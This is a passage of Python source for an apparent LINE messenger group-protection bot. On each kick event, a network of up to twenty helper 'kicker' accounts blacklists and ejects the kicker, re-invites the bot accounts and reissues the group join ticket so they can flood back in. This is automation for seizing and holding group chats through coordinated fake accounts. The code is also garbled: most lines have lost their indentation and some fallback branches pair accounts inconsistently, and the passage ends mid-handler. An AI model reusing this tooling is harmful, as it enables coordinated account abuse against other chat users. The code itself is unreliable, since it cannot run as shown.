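        # Anti-kick (op 19): blacklist and remove the kicker; "ghost" mode re-enters through a one-off QR
        # ticket, and "antijs" mode re-accepts the invitation before the group link is locked again.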
if op.type == 19:
if op.param1 in protectkick:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 19:
if op.param1 in ghost:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
G = line.getGroup(op.param1)
G.preventedJoinByTicket = False
random.choice(ABC).updateGroup(G)
invsend = 0
Ticket = random.choice(ABC).reissueGroupTicket(op.param1)
g1.acceptGroupInvitationByTicket(op.param1,Ticket)
g1.kickoutFromGroup(op.param1,[op.param2])
X = line.getGroup(op.param1)
X.preventedJoinByTicket = True
random.choice(ABC).updateGroup(X)
if op.type == 19:
if op.param1 in protectantijs:
if myMid in op.param3:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
g1.acceptGroupInvitation(op.param1)
g1.inviteIntoGroup(op.param1,[myMid])
g1.kickoutFromGroup(op.param1,[op.param2])
line.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
g1.leaveGroup(op.param1)
line.inviteIntoGroup(op.param1,[Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid,ga1,ga2,ga3,ga4,ga5,ga6,ga7,ga8,ga9,ga10,g1MID])
except:
pass
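        # Self/bot recovery: when the main account or one of the helper accounts is kicked (its mid appears
        # in op.param3), another helper blacklists the kicker, removes them, re-invites the victim and
        # re-accepts the invitation, trying each kicker account in turn until one of the calls succeeds.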
if op.type == 19:
            if myMid in op.param3:
                if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
                    pass
                else:
                    wait["blacklist"][op.param2] = True
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
G = kicker4.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.updateGroup(G)
Ticket = kicker4.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker4.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker4.updateGroup(G)
Ticket = kicker4.reissueGroupTicket(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
pass
return
            if Amid in op.param3:
                if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
                    pass
                else:
                    wait["blacklist"][op.param2] = True
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
G = kicker5.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.updateGroup(G)
Ticket = kicker5.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker5.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker5.updateGroup(G)
Ticket = kicker5.reissueGroupTicket(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
pass
return
            if Bmid in op.param3:
                if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
                    pass
                else:
                    wait["blacklist"][op.param2] = True
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
G = kicker6.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.updateGroup(G)
Ticket = kicker6.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker6.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker6.updateGroup(G)
Ticket = kicker6.reissueGroupTicket(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
pass
return
            if Cmid in op.param3:
                if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
                    pass
                else:
                    wait["blacklist"][op.param2] = True
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
G = kicker7.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.updateGroup(G)
Ticket = kicker7.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker7.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker7.updateGroup(G)
Ticket = kicker7.reissueGroupTicket(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
pass
return
            if Dmid in op.param3:
                if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
                    pass
                else:
                    wait["blacklist"][op.param2] = True
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
G = kicker8.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.updateGroup(G)
Ticket = kicker8.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker8.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker8.updateGroup(G)
Ticket = kicker8.reissueGroupTicket(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
pass
return
            if Emid in op.param3:
                if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
                    pass
                else:
                    wait["blacklist"][op.param2] = True
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
G = kicker9.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.updateGroup(G)
Ticket = kicker9.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker9.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker9.updateGroup(G)
Ticket = kicker9.reissueGroupTicket(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
